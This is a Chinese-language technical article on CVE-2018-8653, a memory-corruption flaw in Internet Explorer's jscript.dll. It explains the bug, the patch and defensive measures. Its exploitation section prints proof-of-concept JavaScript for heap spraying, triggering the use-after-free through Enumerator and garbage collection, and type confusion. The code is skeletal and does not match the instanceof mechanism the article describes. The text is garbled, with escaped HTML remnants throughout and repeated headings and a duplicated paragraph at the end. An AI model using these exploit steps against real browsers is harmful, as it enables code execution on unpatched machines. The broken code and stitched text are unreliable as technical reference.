CVE-2018-8653漏洞分析与利用技术详解<\/h1>

漏洞概述<\/h2>

CVE-2018-8653是Microsoft Internet Explorer脚本引擎(jscript.dll)中的一个内存损坏漏洞，可导致远程代码执行。该漏洞由Google Project Zero团队发现并报告，微软在常规补丁周期外紧急发布了修复程序。<\/p>

受影响范围<\/strong>：<\/p>

Internet Explorer 9至11版本<\/li>
使用jscript.dll的其他Windows应用程序<\/li>
Microsoft Edge不受影响<\/li> <\/ul>
漏洞严重性<\/strong>：<\/p>

CVSS v3.0基本分数：7.5（高）<\/li>
影响分数：5.9<\/li>
可利用性分数：1.6<\/li> <\/ul>
漏洞背景<\/h2>
在2018年，研究人员在Microsoft脚本引擎(Internet Explorer或Edge)中发现了100多个内存损坏漏洞。网络犯罪分子通常在CVE发布后几周内将其集成到漏洞利用工具包中（如RIG和Magnitude），用于传播恶意软件。<\/p>
技术细节分析<\/h2>
漏洞入口点<\/h3>
漏洞的入口点是Microsoft的扩展程序Enumerator对象，该对象提供API来枚举Windows的隐藏对象（主要是ActiveX组件）。当在JavaScript数组上调用时，创建的对象在内存中的存储方式与常规对象不同。<\/p>
关键函数调用链：<\/p>

Enumerator.prototype.item()<\/code>创建的对象被识别为ActiveXObject<\/li>
攻击者可覆盖"prototype"成员（本应为只读属性）<\/li> <\/ol> 漏洞利用原理<\/h3> ActiveXObject原型覆盖<\/strong>：<\/p> 攻击者覆盖ActiveXObject函数的原型功能<\/li> 这允许访问通常不可访问的代码路径<\/li> <\/ul> <\/li> instanceof操作滥用<\/strong>：<\/p> 对特殊对象调用instanceof<\/code>操作时，可以触发控制的回调函数<\/li> 攻击者通过控制回调函数运行自定义JavaScript代码<\/li> <\/ul> <\/li> 内存释放原语<\/strong>：<\/p> 当回调函数被调用时，关键字"this"指向eObj.prototype<\/code><\/li> 将其设置为null并触发垃圾回收可释放对象内存<\/li> 系统需要在释放内存前清除整个变量块才能成功利用<\/li> <\/ul> <\/li> <\/ol> 补丁分析<\/h3> 微软发布的补丁主要修改了NameTbl::InvokeInternal<\/code>函数：<\/p> 增加了对GCRoot::~GCRoot<\/code>（GCRoot析构函数）的调用次数<\/p> 未修补版本：调用一次（由编译器内联）<\/li> 修补后版本：调用两次<\/li> <\/ul> <\/li> 关键修改点：<\/p> 将堆栈地址（局部变量）保存到GCRoot对象列表<\/li> 确保垃圾回收器跟踪这些指针<\/li> <\/ul> <\/li> <\/ol> 漏洞利用步骤<\/h2> 概念验证(PoC)实现<\/h3> 堆准备阶段<\/strong>：<\/p> \/\/ 设置多个数组预分配数据，准备堆状态 <\/span><\/span><\/span><\/span>var<\/span> sprayArrays<\/span> =<\/span> new<\/span> Array(); <\/span><\/span>for<\/span> (var<\/span> i<\/span> =<\/span> 0<\/span>; i<\/span> <<\/span> 0x100<\/span>; i<\/span>++<\/span>) { <\/span><\/span> sprayArrays<\/span>[i<\/span>] =<\/span> new<\/span> Array(0x200<\/span>); <\/span><\/span>} <\/span><\/span><\/code><\/pre><\/li> 触发漏洞<\/strong>：<\/p> \/\/ 声明自定义回调并触发漏洞 <\/span><\/span><\/span><\/span>var<\/span> callback<\/span> =<\/span> function<\/span>() { <\/span><\/span> this<\/span>.prototype<\/span> =<\/span> null<\/span>; \/\/ 将prototype设为null <\/span><\/span><\/span><\/span> CollectGarbage<\/span>(); \/\/ 触发垃圾回收 <\/span><\/span><\/span><\/span>}; <\/span><\/span> <\/span><\/span>var<\/span> eObj<\/span> =<\/span> new<\/span> Enumerator<\/span>([1<\/span>,2<\/span>,3<\/span>]); <\/span><\/span>eObj<\/span>.item<\/span>.call<\/span>({}, callback<\/span>); <\/span><\/span><\/code><\/pre><\/li> 内存回收利用<\/strong>：<\/p> \/\/ 释放对象数组以进行回收操作 <\/span><\/span><\/span><\/span>for<\/span> (var<\/span> i<\/span> =<\/span> 0<\/span>; i<\/span> <<\/span> 0x100<\/span>; i<\/span>++<\/span>) { <\/span><\/span> sprayArrays<\/span>[i<\/span>] =<\/span> null<\/span>; <\/span><\/span>} <\/span><\/span> <\/span><\/span>\/\/ 分配字符串覆盖释放的内存 <\/span><\/span><\/span><\/span>var<\/span> reallocPropertyName<\/span> =<\/span> "AAAAAAAA"<\/span> +<\/span> "\x03\x00\x00\x00"<\/span> +<\/span> "\x39\x05\x00\x00"<\/span>; <\/span><\/span><\/code><\/pre><\/li> 类型混淆利用<\/strong>：<\/p> \/\/ 利用释放后重用(UAF)实现类型混淆 <\/span><\/span><\/span><\/span>var<\/span> obj<\/span> =<\/span> {}; <\/span><\/span>obj<\/span>[reallocPropertyName<\/span>] =<\/span> 1<\/span>; <\/span><\/span> <\/span><\/span>\/\/ 此时可读取或修改本应不可访问的内存 <\/span><\/span><\/span><\/code><\/pre><\/li> <\/ol> 防御措施<\/h2> McAfee修复方案<\/h3> McAfee提供了以下产品的防护方案：<\/p> 端点安全(ENS)<\/li> ENS自适应防护(ENS-ATP)<\/li> 主机入侵防御(HIPS)<\/li> VirusScan Enterprise(VSE)<\/li> WSS<\/li> <\/ul> 通用防护建议<\/h3> 及时更新<\/strong>：<\/p> 立即应用微软发布的安全补丁<\/li> 保持所有安全产品更新至最新版本<\/li> <\/ul> <\/li> 纵深防御<\/strong>：<\/p> 使用端点安全产品检测和阻止此类威胁<\/li> 启用缓冲区溢出保护规则<\/li> <\/ul> <\/li> 缓解措施<\/strong>：<\/p> 限制ActiveX控件执行<\/li> 启用增强的受保护模式(Enhanced Protected Mode)<\/li> 使用EMET或其他漏洞利用缓解技术<\/li> <\/ul> <\/li> <\/ol> 总结<\/h2> CVE-2018-8653展示了脚本引擎漏洞的严重性和快速武器化的可能性。攻击者可以通过网页或JavaScript文件在未修补系统上执行任意代码。尽管微软已修复此漏洞，但未修补系统仍面临高风险。<\/p> 关键要点<\/strong>：<\/p> 理解Enumerator对象和ActiveXObject交互的异常行为<\/li> 掌握通过instanceof操作触发非常规代码路径的技术<\/li> 认识垃圾回收机制在漏洞利用中的关键作用<\/li> 实施多层次防御策略应对此类威胁<\/li> <\/ul>

CVE-2018-8653漏洞分析与利用技术详解<\/h1>

漏洞背景<\/h2> 在2018年，研究人员在Microsoft脚本引擎(Internet Explorer或Edge)中发现了100多个内存损坏漏洞。网络犯罪分子通常在CVE发布后几周内将其集成到漏洞利用工具包中（如RIG和Magnitude），用于传播恶意软件。<\/p>

技术细节分析<\/h2>

漏洞利用步骤<\/h2>

防御措施<\/h2>

漏洞背景<\/h2>
在2018年，研究人员在Microsoft脚本引擎(Internet Explorer或Edge)中发现了100多个内存损坏漏洞。网络犯罪分子通常在CVE发布后几周内将其集成到漏洞利用工具包中（如RIG和Magnitude），用于传播恶意软件。<\/p>